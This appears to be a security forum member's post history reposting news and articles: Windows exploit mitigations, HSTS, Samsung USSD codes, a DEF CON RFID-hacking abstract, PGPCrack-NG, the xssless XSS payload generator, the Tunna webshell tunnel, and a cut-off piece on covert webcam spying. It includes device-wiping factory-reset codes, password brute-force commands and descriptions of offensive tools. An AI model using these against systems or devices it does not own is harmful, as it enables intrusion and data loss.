Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [h=1]Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released[/h] December 20th, 2013, 08:35 GMT · By Silviu Stahie Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) has been released and is now available for download and testing. We prepared a screenshot tour to get a sneak peek at the new operating system. The best news for the fans of Ubuntu GNOME is that the 14.04 will include a number of GNOME applications from the 3.10 stack. Also, the GNOME Classic session has been included. To try it, users just have to choose it from the Sessions option on the login screen. “The Alpha 1 Trusty Tahr snapshot includes the 3.12.0.7 Ubuntu Linux kernel which is based on the the upstream v3.12.4 Linux kernel. The 3.12 release contains improvements to the dynamic tick code, support infrastructure for DRM render nodes, TSO sizing and the FQ scheduler in the network layer, support for user namespaces in the XFS filesystem, multithreaded RAID5 in the MD subsystem, and more,” reads the official announcement. Check it out for more details about this release. Download Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) right now from Softpedia. Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only. Sursa: Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released – Screenshot Tour
  2. Exploit Protection for Microsoft Windows By Guest Writer posted 13 Dec 2013 at 05:52AM Software exploits are an attack technique used by attackers to silently install various malware – such as Trojans or backdoors – on a user’s computer without requiring social engineering to trick the victim into manually running a malicious program. Such malware installation through an exploit would be invisible to the user and gives attackers an undeniable advantage. Exploits attempt to use vulnerabilities in particular operating system or application components in order to allow malware to execute. In our previous blog post titled Solutions to current antivirus challenges, we discussed several methods by which security companies can tackle the exploit problem. In this post, we provide more detail on the most exploited applications on Microsoft Windows platforms and advise a few steps users can (and should) take to further strengthen their defenses. Exploitation Targets The following applications are the ones most targeted by attackers through exploitation: Web browsers (Microsoft Internet Explorer, Google Chrome, Apple Safari, Mozilla Firefox and others). Plug-ins for browsers (Adobe Flash Player, Oracle Java, Microsoft Silverlight). The Windows operating system itself – notably the Win32 subsystem driver – win32k.sys. Adobe Reader and Adobe Acrobat Other specific applications Different types of exploits are used in different attack scenarios. One of the most dangerous scenarios for an everyday user is the use of exploits by attackers to remotely install code into the operating system. In such cases, we usually find that the user has visited a compromised web resource and their system has been invisibly infected by malicious code (an attack often referred to as a “drive-by download”). If your computer is running a version of software such as a web browser or browser plug-ins that are vulnerable to exploitation, the chances of your system becoming infected with malware are very high due to the lack of mitigation from the software vendor. In the case of specific targeted attacks or attacks like a “watering hole” attack, when the attacker plants the exploit code on websites visited by the victim, the culprit can use zero-day (0-day) vulnerabilities in software or the operating system. Zero-day vulnerabilities are those that have not been patched by the vendor at the time they are being exploited by attackers. Another common technique used in targeted attacks is to send the victim a PDF document “equipped” with an exploit. Social engineering is also often used, for example by selecting a filename and document content in such a way that the victim is likely to open it. While PDFs are first and foremost document files, Adobe has extended the file format to maximize its data exchange functionality by allowing scripting and the embedding of various objects into files, and this can be exploited by an attacker. While most PDF files are safe, some can be dangerous, especially if obtained from unreliable sources. When such a document is opened in a vulnerable PDF reader, the exploit code triggers the malicious payload (such as installation of a backdoor) and a decoy document is often opened. Another target which attackers really love is Adobe Flash Player, as this plug-in is used for playback of content on all the different browsers. Like other software from Adobe, Flash Player is updated regularly as advised by the company’s updates (see Adobe Security Bulletins). Most of these vulnerabilities are of the Remote Code Execution (RCE) type and this indicates that the attackers could use such a vulnerability for remotely executing malicious code on a victim’s computer. In relation to the browser and operating system, Java is a virtual machine (or runtime environment JRE) able to execute Java applications. Java applications are platform-independent, making Java a very popular tool to use. Today Java is used by more than three billion devices. As with other browser plug-ins, misusing the Java plug-in is attractive to attackers, and given our previous experience of the malicious actions and vulnerabilities with which it is associated, we can say that as browser plug-ins go, Java represents one of the most dangerous components. Also, various components of the Windows operating system itself can be used by attackers to remotely execute code or elevate privileges. The figure below shows the number of patches various Windows components have received during 2013 (up until November). Chart 1: Number of patches per component The “Others” category includes vulnerabilities which were fixed for various Operating System components (CSRSS, SCM, GDI, Print Spooler, XML Core Services, OLE, NFS, Silverlight, Remote Desktop Client, Active Directory, RPC, Exchange Server). This ranking shows that Internet Explorer fixed the largest number of vulnerabilities, more than a hundred vulnerabilities having been fixed in the course of fourteen updates. Seven of the vulnerabilities had the status ‘is-being-exploited-in-the-wild at the time of patching’: that is, they were being actively exploited by attackers. The second most-patched component of the operating system is the infamous Windows subsystem driver win32k.sys. Vulnerabilities in this driver are used by attackers to escalate privileges on the system, for example, to bypass restrictions imposed by User Account Control (UAC), a least-privilege mechanism introduced by Microsoft in Windows Vista to reduce the risk of compromise by an attack that requires administrator privileges. Mitigation techniques We now look in more detail at the most exploited applications and provide some steps that you can (and should) take to mitigate attacks and further strengthen your defenses. Windows Operating System Modern versions of Microsoft Windows – i.e., Windows7, 8, and 8.1 at time of writing – have built-in mechanisms which can help to protect user from destructive actions delivered by exploits. Such features became available starting with Windows Vista and were upgraded in the most recent operating system versions. These features include: DEP (Data Execution Prevention) & ASLR (Address Space Layout Randomization) mechanisms introduce an extra layer of complication when attempting to exploit vulnerabilities in applications and the operating system. This is due to special restrictions on the use of memory which should not be used to execute code, and the placement of program modules into memory at random addresses. UAC (User Account Control) has been upgraded from Windows 7 onward and requires confirmation from the user before programs can be run that need to change system settings and create files in system directories. SmartScreen Filter helps to prevent the downloading of malicious software from the Internet based on the file’s reputation: files known to be malicious or not recognized by the filter are blocked. Originally it was a part of Internet Explorer, but with the release of Windows 8 it was built into the operating system so it now works with all browsers. Special “Enhanced Protected Mode” for Internet Explorer (starting from IE10): on Windows 8 this mode allows the browser’s tabs to be run in the context of isolated processes, which are prevented from performing certain actions (a technique also known as sandboxing). For Windows 7 x64 (64-bit) this feature allows IE to run tabs as separate 64-bit processes, which help to mitigate the common heap-spray method of shellcode distribution. For more information, refer to the MSDN blog (here and here). PDF files In view of the high risks posed by the use PDF documents from unsafe sources, and given the low awareness of many users and their reluctance to protect themselves adequately, modern versions of Adobe Reader have a special “Protected Mode” (also referred to as sandboxing) for viewing documents. When using this mode, code from the PDF file is prevented from executing certain potentially dangerous functions. Figure 2: “Sandbox” mode options for Adobe Reader can be enabled through Edit -> Preferences -> Security (Enhanced). By default, Protected Mode is turned off. Despite the active option Enable Protected Mode at startup, sandbox mode stays turned off because Protected Mode setting is set to “Disabled” status. Accordingly, after installation it is strongly recommended that you turn on this setting to apply to “Files From Potentially Unsafe Locations” or, even better, “All files”. Please note that when you turn on protected view, Adobe Reader disables several features which can be used in PDF files. Therefore, when you open the file, you may receive a tooltip alert advising you that protected mode is active. Figure 3: Tooltip which indicates active protected mode. If you are sure about the origin and safety of the file, you can activate all of its functions by pressing the appropriate button. Adobe Flash Player Adobe, together with the manufacturers of web browsers, has made available special features and protective mechanisms to defend against exploits that target the Flash Player plug-in. Browsers such as Microsoft Internet Explorer (starting with version 10 on Windows 8.0 and later), Google Chrome and Apple Safari (latest version) launch the Flash Player in the context of specially-restricted (i.e. sandboxed) process, limiting the ability of this process to access many system resources and places in the file system, and also to limit how it communicates with the network. Timely update of the Flash Player plug-in for your browser is very important. Google Chrome and Internet Explorer 10+ are automatically updated with the release of new versions of Flash Player. To check your version of the Adobe Flash Player you can use this official Adobe resource. In addition, most browsers support the ability to completely disable the Flash Player plug-in, so as to prohibit the browser from playing such content. Internet Browsers At the beginning of this article we already mentioned that attackers often rely on delivering malicious code using remote code execution through the browser (drive-by downloads). Regardless of what browser plug-ins are installed, the browser itself may contain a number of vulnerabilities known to the attacker (and possibly not known to the browser vendor). If the vulnerability has been patched by the developer and an update for it is available, the user can install it and without worrying that it will be used to compromise the operating system. On the other hand, if the attackers are using a previously unknown vulnerability, in other words one that has not yet been patched (zero-day), the situation is more complicated for the user. Modern browsers and operating systems incorporate special technologies for isolating application processes, thus creating special restrictions on performing various actions, which the browser should not be able to perform. In general, this technique is called sandboxing and it allows users to limit what a process can do. One example of this isolation is the fact that modern browsers (for example, Google Chrome and Internet Explorer) execute tabs as separate processes in the operating system, thus allowing restricted permissions for executing certain actions in a specific tab as well as maintaining the stability of the browser. If one of the tabs hangs, the user can terminate it without terminating other tabs. In modern versions of Microsoft’s Internet Explorer browser (IE10 and IE11) there is a special sandboxing technology, which is called “Enhanced Protected Mode” (EPM). This mode allows you to restrict the activity of a process tab or plug-in and thus make exploitation much more difficult for attackers. Figure 4: Enhanced Protected Mode option turned on in Internet Explorer settings (available since IE10). On Windows 8+ (IE11) it was turned on by default before applying MS13-088. EPM has been upgraded for Windows 8. If you are using EPM in Windows 7 x64, then this feature will cause that browser tabs are run as 64-bit processes (on a 64-bit OS Internet Explorer runs its tabs as 32-bit processes by default). Note that by default EPM is off. Figure 5. Demonstration of EPM at work on Windows 7 x64 [using Microsoft Process Explorer]. With this option turned on, the processes of browser tabs work as 64-bit, making them difficult to use for malicious code installation (or at least harder for heap-spraying attacks). Starting with Windows 8, Enhanced Protected Mode has been expanded in order to isolate (sandbox) a process’s actions at the operating system level. This technology is called “AppContainer” and allows the maximum possible benefit from the use of the EPM option. Internet Explorer tab processes with the EPM option active work in AppContainer mode. In addition, Windows 8 EPM mode is enabled by default (IE11). Figure 6. EPM implementation in Windows 8. In Windows 7 x64 EPM uses 64-bit processes for IE tabs for mitigation, instead of AppContainer. Note that before November Patch Tuesday 2013, which includes MS13-088 update (Cumulative Security Update for Internet Explorer: November 12, 2013) Microsoft supported EPM as default setting for IE11 on Windows 8+. But this update disables EPM for IE11 as default setting. So, now if you reset advanced IE settings («Restore advanced settings» option) to ‘initial state’, EPM will turn off by default. Google Chrome, like Internet Explorer, has special features to mitigate drive-by download attacks. But unlike Internet Explorer, sandboxing mode for Chrome is always active and requires no additional action by the user to launch it. This feature of Chrome means that tab processes work with restricted privileges, which does not allow them to perform various system actions. Figure 7: Sandboxing mode as implemented in Google Chrome. Notice that almost all of the user’s SID groups in the access token have the “Deny” status, restricting access to the system. Additional information can be found on MSDN. In addition to this mode, Google Chrome is able to block malicious URL-addresses or websites which have been blacklisted by Google because of malicious actions (Google Safe Browsing). This feature is similar to Internet Explorer’s SmartScreen. Figure 8: Google Safe Browsing in Google Chrome blocking a suspicious webpage. When you use Java on Windows, its security settings can be changed using the control panel applet. In addition, the latest version contains security settings which allow you to configure the environment more precisely, allowing only trusted applications to run. Figure 9: Options for updating Java. To completely disable Java in all browsers used in the system, remove the option “Enable Java content in the browser” in Java settings. Figure 10: Java setting to disable its use in all browsers. EMET Microsoft has released a free tool for users to help protect the operating system from malicious actions used in exploits. Figure 11: EMET interface. The Enhanced Mitigation Experience Toolkit (EMET) uses preventive methods to block various actions typical of exploits and to protect applications from attacks. Despite the fact that Windows 7 and Windows 8 have built-in options for DEP and ASLR, which are enabled by default and intended to mitigate the effects of exploitation, EMET allows the introduction of new features for blocking the action of exploits and enable DEP or ASLR for specified processes (increasing system protection in older versions of the OS). This tool must be configured separately for each application: in other words, to protect an application using this tool, you need to include that specific application in the list. In addition there is a list of applications for which EMET is enabled by default: for example, the browser Internet Explorer, Java and Microsoft Office. It’s a good idea to add to the list your favorite browser and Skype. Operating System Updates Keeping your operating system and installed software promptly updated and patched is good practice because vendors regularly use patches and updates to address emerging vulnerabilities. Note that Windows 7 and 8 have the ability to automatically deliver updates to the user by default. You can also check for updates through the Windows Control Panel as shown below. Figure 12: Windows Update Generic Exploit Blocking So far, we have looked at blocking exploits that are specific to the operating system or the applications you are using. You may also want to look at blocking exploits in general. You may be able to turn to your security software for this. For example, ESET introduced something called the Exploit Blocker in its seventh generation of security products with its anti-malware programs ESET Smart Security and ESET NOD32 Antivirus. The Exploit Blocker is a proactive mechanism that works by analyzing suspicious program behavior and generically detecting signs of exploitation, regardless of the specific vulnerability that was used. Figure 1: ESET Exploit Blocker option turned on in HIPS settings. Conclusion Any operating system or program which is widely used will be studied by attackers for vulnerabilities to exploit for illicit purposes and financial gain. As we have shown above, Adobe, Google and Microsoft have taken steps to make these types of attacks against their software more difficult. However, no single protection technique can be 100% effective against determined adversaries, and users have to remain vigilant about patching their operating systems and applications. Since some vendors update their software on a monthly basis, or even less frequently, it is important to use (and keep updated) anti-malware software which blocks exploits. This article was contributed by: Artem Baranov, Lead Virus Analyst for ESET’s Russian distributor. Author Guest Writer, We Live Security Sursa: Exploit Protection for Microsoft Windows
  3. HSTS – The missing link in Transport Layer Security Posted on November 30, 2013 by Scott Helme HTTP Strict Transport Security (HSTS) is a policy mechanism that allows a web server to enforce the use of TLS in a compliant User Agent (UA), such as a web browser. HSTS allows for a more effective implementation of TLS by ensuring all communication takes place over a secure transport layer on the client side. Most notably HSTS mitigates variants of man in the middle (MiTM) attacks where TLS can be stripped out of communications with a server, leaving a user vulnerable to further risk. Introduction In a previous blog I demonstrated using SSLstrip to MiTM SSL and the dangers it posed. Once installed as a MiTM, SSLstrip will connect to a server on behalf of the victim and communicate using HTTPS. The server is satisfied with the secure communication to the attacker who then transparently forwards all data to the victim using HTTP. This is possible because the victim does not enforce the use of TLS and either typed in twitter.com and the browser defaulted to http://, or they were using a bookmark or link that contained http://. Once Twitter receives the request it issues a redirect back to the victim’s browser pointing to the https:// URL. Because all of this is done using HTTP the communications are vulnerable to be intercepted and modified by SSLstrip. Crucially, the user receives no warnings during the attack and can’t verify if they should be using https://. HSTS mitigates this threat by providing an option to enforce the use of TLS by the browser, which would prevent the user navigating to the site using http://. Implementing HSTS In order to implement HSTS a host must declare to a UA that it is a HSTS Host by issuing a HSTS Policy. This is done with the addition of the HTTP response header ‘Strict-Transport-Security: max-age=31536000‘. The max-age directive is required and can be any value from 0 upwards, which is the number of seconds after receiving the policy that the UA is to treat the host issuing it as a HSTS Host. It’s worth noting that a max-age directive value of 0 informs the UA to cease treating the host that issued it as a HSTS Host and to remove all policy. It does not imply an infinite max-age directive value. There is also an optional includeSubDomains directive that can be included at the discretion of the host such as ‘Strict-Transport-Security: max-age=31536000; includeSubDomains‘. This would, as expected, inform the UA that all subdomains are to be treated as HSTS Hosts also. Twitter’s HSTS Policy The HSTS response header should only be sent over a secure transport layer but UAs should ignore this header if received over HTTP. This is primarily because an attacker running a MiTM attack could maliciously strip out or inject this header into a HTTP response causing undesired behaviour. This however does present a very slim window of opportunity for an attacker in a targeted attack. Upon a user’s very first interaction with Twitter, the browser will have no knowledge of a HSTS Policy for the host. This will result in the first communication taking place over HTTP and not HTTPS. Once Twitter receives the request and replies with a redirect to a HTTPS version of the site, still using HTTP, an attacker could simply effect a MiTM attack against the victim as they would before. The viability of this form of attack however has, overall, been tremendously reduced. The only opportunity the attacker now has, is to be setup and prepared to intercept the very first communication ever with the host, or, wait until the HSTS policy expires after the victim has had no further communication with the host for the duration of the max-age directive. HSTS Header sent via HTTPS No HSTS Header sent via HTTP Once the user has initiated communications with a host that declares a valid HSTS Policy the UA will consider the host to be a HSTS Host for the duration of max-age and store the policy. During this time the UA will afford the user the following protections. 1. UAs transform insecure URI references to an HSTS Host into secure URI references before dereferencing them. 2. The UA terminates any secure transport connection attempts upon any and all secure transport errors or warnings. source Point 1 means that once Twitter has been accepted by the UA as a HSTS Host that the UA will replace any reference to http:// with https:// where the host is twitter.com (and it’s subdomains if specified) before it sends the request. This includes links found on any webpage that use http://, short cuts or bookmarks that may specify http:// and even user input such as the address bar. Even if http:// is explicitly defined as the protocol of choice the UA will enforce https://. Point 2 is also fairly important, if not as important as point 1. By terminating the connection as soon as a warning or error message is triggered the UA will prevent the user from clicking through them. This commonly happens when the user does not understand what the message is saying or because they are not concerned about the security of the connection. Many attacks are dependent on the poor manner in which users are informed of potential risk and the poor response from users to this warning. By simply terminating the connection when there is cause for any uncertainty provides the highest possible level of protection to the user. It even stops you accidentally clicking through an error message! So, once a user has a valid HSTS Policy in place, their request to http://twitter.com should go from something like this: Initial request uses HTTP with no HSTS policy enforced To something like this instead: All requests use HTTPS when HSTS is enforced This can also be verified using the Chrome Developer Tools. Open a new tab, click the Chrome Menu in the top right then select Tools -> Developer Tools and open the network tab. Now navigate to http://twitter.com (you must have visited the site before). You can see the initial request that would have gone to http://twitter.com is not sent and the browser immediately replaces that with a request to https://twitter.com instead. Request using HTTP is not sent HTTP request replaced with HTTPS equivalent HSTS In Practise Whilst not yet being widely deployed HSTS has started to make a more widespread appearance since the specification was published in Nov 2012. Below you can see that both Twitter and Facebook have the HSTS response header set, though Facebook doesn’t appear to have a very long max-age value. Twitter: Facebook: Out of interest I decided to check a selection of websites for high street banks and see if any had yet implemented a HSTS Policy. Having checked Barlcays, Halifax, HSBC, Nationwide, Natwest, RBS, Santander and Yorkshire Bank I was disappointed to find that none had yet implemented a HSTS Policy and some of them even have a dedicated online banking domain name. Preloaded HSTS It is also possible for a browser to ship with a preloaded list of HSTS Hosts. The Chrome and Firefox browsers both feature a built in list of sites that will always be treated as HSTS Hosts regardless of the presence of the HSTS response header. Websites can opt in to be included in the list of preloaded hosts and you can view the Chromium Source to see all the hosts already included. For sites preloaded in the browser there is no state where communications will take place that do not travel on a secure transport layer. Be that the initial communication, the first communication after wiping the local cache or any communication after a policy would have expired, the user cannot exchange data using HTTP. The browser will afford the protection of HSTS for the applicable hosts at all times. Unfortunately this solution isn’t really scalable considering the sheer potential for the number of sites that could be included. That said, if all financial institutions, government sites, social networks and any other potentially large target applied to be included, they could mitigate a substantial amount of risk. Conclusion HSTS has been a highly anticipated and a much needed solution to the problems of HTTP being the default protocol for a UA and the lack of an ability for a host to reliably enforce secure communications. For any site that issues permanent redirects to HTTPS the addition of the HSTS response header is a much safer way of enforcing secure communications for compliant UAs. By preventing the UA from sending even the very first request via HTTP, HSTS removes the only opportunity a MiTM has to gain a foothold in a secure transport layer. Scott. Short URL: http://scotthel.me/hsts Sursa: https://scotthelme.co.uk/hsts-the-missing-link-in-tls/
  4. [REF] List of USSD codes! by kevhuff Thought I would compile a list of USSD codes for everyones reference. I have tested most if anybody has any to add please feel free. ****Warning some of these codes can be harmful( wipe data and ect.) I am not responsible for anything you do to your device**** Some of these codes may lead you to a menu use the option key (far left soft key) to navigate Some of the functions may be locked to our use but im still working on how to use these menus more extensively Information *#44336# Software Version Info *#1234# View SW Version PDA, CSC, MODEM *#12580*369# SW & HW Info *#197328640# Service Mode *#06# = IMEI Number. *#1234# = Firmware Version. *#2222# = H/W Version. *#8999*8376263# = All Versions Together. *#272*imei#* Product code *#*#3264#*#*- RAM version *#92782# = Phone Model *#*#9999#*#*= Phone/pda/csc info Testing *#07# Test History *#232339# WLAN Test Mode *#232331# Bluetooth Test Mode *#*#232331#*#*- Bluetooth test *#0842# Vibration Motor Test Mode *#0782# Real Time Clock Test *#0228# ADC Reading *#32489# (Ciphering Info) *#232337# Bluetooth Address *#0673# Audio Test Mode *#0*# General Test Mode *#3214789650# LBS Test Mode *#0289# Melody Test Mode *#0589# Light Sensor Test Mode *#0588# Proximity Sensor Test Mode *#7353# Quick Test Menu *#8999*8378# = Test Menu. *#*#0588#*#*- Proximity sensor test *#*#2664#*#*- Touch screen test *#*#0842#*#*- Vibration test* Network *7465625*638*# Configure Network Lock MCC/MNC #7465625*638*# Insert Network Lock Keycode *7465625*782*# Configure Network Lock NSP #7465625*782*# Insert Partitial Network Lock Keycode *7465625*77*# Insert Network Lock Keycode SP #7465625*77*# Insert Operator Lock Keycode *7465625*27*# Insert Network Lock Keycode NSP/CP #7465625*27*# Insert Content Provider Keycode *#7465625# View Phone Lock Status *#232338# WLAN MAC Address *#526# WLAN Engineering Mode -runs wlan tests (same as below) *#528# WLAN Engineering Mode *#2263# RF Band Selection-not sure about this one appears to be locked *#301279# HSDPA/HSUPA Control Menu---change HSDPA classes (opt. 1-5) Tools/Misc. *#*#1111#*#*- Service Mode #273283*255*663282*# Data Create SD Card *#4777*8665# = GPSR Tool. *#4238378# GCF Configuration *#1575# GPS Control Menu *#9090# Diagnostic Configuration *#7284# USB I2C Mode Control—mount to usb for storage/modem *#872564# USB Logging Control *#9900# System dump mode- can dump logs for debugging *#34971539# Camera Firmware Update *#7412365# Camera Firmware Menu *#273283*255*3282*# Data Create Menu- change sms, mms, voice, contact limits *2767*4387264636# Sellout SMS / PCODE view *#3282*727336*# Data Usage Status *#*#8255#*#*- Show GTalk service monitor-great source of info *#3214789# GCF Mode Status *#0283# Audio Loopback Control #7594# Remap Shutdown to End Call TSK *#272886# Auto Answer Selection ****SYSTEM*** USE CAUTION *#7780# Factory Reset *2767*3855# Full Factory Reset *#*#7780#*#* Factory data reset *#745# RIL Dump Menu *#746# Debug Dump Menu *#9900# System Dump Mode *#8736364# OTA Update Menu *#2663# TSP / TSK firmware update *#03# NAND Flash S/N BAM!!!! Sursa: [REF] List of USSD codes! [updated 10-30] - xda-developers
  5. Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard Description: Have you ever attended an RFID hacking presentation and walked away with more questions than answers? This talk will finally provide practical guidance on how RFID proximity badge systems work. We'll cover what you'll need to build out your own RFID physical penetration toolkit, and how to easily use an Arduino microcontroller to weaponize commercial RFID badge readers — turning them into custom, long-range RFID hacking tools. This presentation will NOT weigh you down with theoretical details, discussions of radio frequencies and modulation schemes, or talk of inductive coupling. It WILL serve as a practical guide for penetration testers to understand the attack tools and techniques available to them for stealing and using RFID proximity badge information to gain unauthorized access to buildings and other secure areas. Schematics and Arduino code will be released, and 100 lucky audience members will receive a custom PCB they can insert into almost any commercial RFID reader to steal badge info and conveniently save it to a text file on a microSD card for later use (such as badge cloning). This solution will allow you to read cards from up to 3 feet away, a significant improvement over the few centimeter range of common RFID hacking tools. Some of the topics we will explore are: Overview of best RFID hacking tools available to get for your toolkit Stealing RFID proximity badge info from unsuspecting passers-by Replaying RFID badge info and creating fake cloned cards Brute-forcing higher privileged badge numbers to gain data center access Attacking badge readers and controllers directly Planting PwnPlugs, Raspberry Pis, and similar devices as physical backdoors to maintain internal network access Creating custom RFID hacking tools using the Arduino Defending yourself from RFID hacking threats This DEMO-rich presentation will benefit both newcomers and seasoned professionals of the physical penetration testing field. Francis Brown (@security_snacks) CISA, CISSP, MCSE, is a Managing Partner at Bishop Fox (formerly Stach & Liu), a security consulting firm providing IT security services to the Fortune 1000 and global financial institutions as well as U.S. and foreign governments. Before joining Bishop Fox, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients. Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, RSA, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications. Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation, C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques. https://www.facebook.com/BishopFoxConsulting https://twitter.com/security_snacks For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard
  6. PGPCrack-NG PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files. It is a replacment for the long dead PGPCrack. PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files. On Fedora 19, do sudo yum install libassuan-devel -y. On Ubuntu, do sudo apt-get libpth-dev libbz2-dev libassuan-dev. Compile using make. You might need to edit -I/usr/include/libassuan2 part in the Makefile. Run cat ~/magnum-jumbo/run/password.lst | ./PGPCrack-NG <PGP file> john -i -stdout | ./PGPCrack-NG <PGP file> Speed: > 1330 passwords / second on AMD X3 720 CPU @ 2.8GHz (using single core). Sursa si download: https://github.com/kholia/PGPCrack-NG
  7. xssless – Automatic XSS Payload Generator After working with more and more complex Javascript payloads for XSS I realized that most of the work I was doing was unnecessary! I scraped together some snippets from my Metafidv2 project and created “xssless”, an automated XSS payload generator. This tool is sure to save some time on more complex sites that make use of tons of CSRF tokens and other annoying tricks. Psst! If you already understand all of this stuff and don’t want to read this post click here for the github link. The XSS Vulnerability Once you have your initial XSS vulnerability found you’re basically there! Now you can do evil things like session hijacking and much more! But wait, what if the site is extra secure and locks you out if you use the same session token from a different IP address? Does this mean your newly found XSS is useless? Of course not! XSS Worms & JavaScript Payloads Remember, if you can execute JavaScript in the user’s browser you can do anything the user’s browser can do. This means as long as you’re obeying same-domain, you’re good to go! How? JavaScript payloads of course! Not only are JavaScript payloads real, they are quite dangerous – people often write-up XSS as being a ‘low priority’ issue in security. This is simply not true, I have to imagine this comes from a lack of amazement at the casual JavaScript popup alerts with session cookies as the message. Less we forget how powerful the Samy Worm was, propagating to over a million accounts and running MySpace’s servers into the ground. This was one of the first big displays of just how powerful XSS could be. Building Complex Payloads Building payloads can be a real pain, custom coding every POST/GET request and parsing CSRF tokens all while debugging to ensure it works. After building a rather complex payload I realized this is pointless, why couldn’t a script do the same? xssless Work hard not smart, using xssless you can automatically generate payloads for any site quickly and efficiently. xssless generates payloads from Burp proxy exported requests, meaning you do your web actions in the browser though Burp and then export them into xssless. An Example Scenario Image if we had an XSS in reddit.com, of course we want to use this cool new exploit (because we lack morality and this is an example so bite me). We fire up Burp and set Firefox to use it as a proxy, now we just preform the web action we want to make a payload for. ... Click Here for the Github Page Sursa: xssless - Automatic XSS Payload Generator | The Hacker Blog
  8. Nytro

    Fun stuff

  9. Nytro

    Tunna

    Overview Tunna is a tool designed to bypass firewall restrictions on remote webservers. It consists of a local application (supporting Ruby and Python) and a web application (supporting ASP.NET, Java and PHP). Description Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. The web application file must be uploaded on the remote server. It will be used to make a local connection with services running on the remote web server or any other server in the DMZ. The local application communicates with the webshell over the HTTP protocol. It also exposes a local port for the client application to connect to. Since all external communication is done over HTTP it is possible to bypass the filtering rules and connect to any service behind the firewall using the webserver on the other end. Tunna framework Tunna framework comes witht he following functionality: [TABLE=width: 90%, align: center] [TR] [TD][/TD] [TD=class: txt12]Ruby client - proxy bind: Ruby client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]Python client - proxy bind: Python client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]Metasploit integration module, which allows transparent execution of metasploit payloads on the server[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]ASP.NET remote script[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]Java remote script[/TD] [/TR] [TR] [TD][/TD] [TD=class: txt12]PHP remote script[/TD] [/TR] [/TABLE] Author Tunna has been developed by Nikos Vassakis. Download: http://www.secforce.com/research/tunna_download.html Sursa: SECFORCE :: Penetration Testing :: Research
  10. [h=1]The Pirate Bay's Guyana Domain Goes Down[/h]December 19th, 2013, 08:31 GMT · By Gabriela Vatu - The Pirate Bay's new domain is no longer working The Pirate Bay has been on the run from domain to domain, changing quite a few over the past week. Only yesterday, the site left Peru and moved to the Republic of Guyana. Now, thepiratebay.gy is no longer working, although it’s uncertain if the domain was seized and the site has moved on to another location or there’s an issue with the servers. The site’s insiders said that the easiest way to access the Pirate Bay would be via its old domains over at .SE and .ORG, which would redirect users to the newest homepage, wherever that might be. However, this doesn’t seem to be working either for now. The site’s admins said yesterday that they already had a bunch of domains set up in case they needed to leave again, mentioning that there were about 70 more domains to choose from. Last week, Pirate Bay lost its .SX domain. From there, it moved to Ascension Island’s .AC for about a day, before going to the Peruvian domain. Yesterday, the site had to relocate to .GY. As soon as the site settles for a new domain, the blog will be updated, so check back soon. [uPDATE] The Pirate Bay site seems to be working on the Swedish .SE domain for now, but it looks like it's impossible to download any magnet links at the moment. Most likely, the torrent site is only passing through as it seeks to settle into a new domain. Sursa: The Pirate Bay's Guyana Domain Goes Down [uPDATE]
  11. Research shows how MacBook Webcams can spy on their users without warning By Ashkan Soltani and Timothy B. Lee December 18 at 2:25 pm The woman was shocked when she received two nude photos of herself by e-mail. The photos had been taken over a period of several months — without her knowledge — by the built-in camera on her laptop. Fortunately, the FBI was able to identify a suspect: her high school classmate, a man named Jared Abrahams. The FBI says it found software on Abrahams’s computer that allowed him to spy remotely on her and numerous other women. Abrahams pleaded guilty to extortion in October. The woman, identified in court papers only as C.W., later identified herself on Twitter as Miss Teen USA Cassidy Wolf. While her case was instant fodder for celebrity gossip sites, it left a serious issue unresolved. Most laptops with built-in cameras have an important privacy feature — a light that is supposed to turn on any time the camera is in use. But Wolf says she never saw the light on her laptop go on. As a result, she had no idea she was under surveillance. That wasn’t supposed to be possible. While controlling a camera remotely has long been a source of concern to privacy advocates, conventional wisdom said there was at least no way to deactivate the warning light. New evidence indicates otherwise. Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, said in a recent story in The Washington Post that the FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years. Now research from Johns Hopkins University provides the first public confirmation that it’s possible to do just that, and demonstrates how. While the research focused on MacBook and iMac models released before 2008, the authors say similar techniques could work on more recent computers from a wide variety of vendors. In other words, if a laptop has a built-in camera, it’s possible someone — whether the federal government or a malicious 19 year old — could access it to spy on the user at any time. One laptop, many chips The built-in cameras on Apple computers were designed to prevent this, says Stephen Checkoway, a computer science professor at Johns Hopkins and a co-author of the study. “Apple went to some amount of effort to make sure that the LED would turn on whenever the camera was taking images,” Checkoway says. The 2008-era Apple products they studied had a “hardware interlock” between the camera and the light to ensure that the camera couldn’t turn on without alerting its owner. The cameras Brocker and Checkoway studied. (Matthew Brocker and Stephen Checkoway) But Checkoway and his co-author, Johns Hopkins graduate student Matthew Brocker, were able to get around this security feature. That’s because a modern laptop is actually several different computers in one package. “There’s more than one chip on 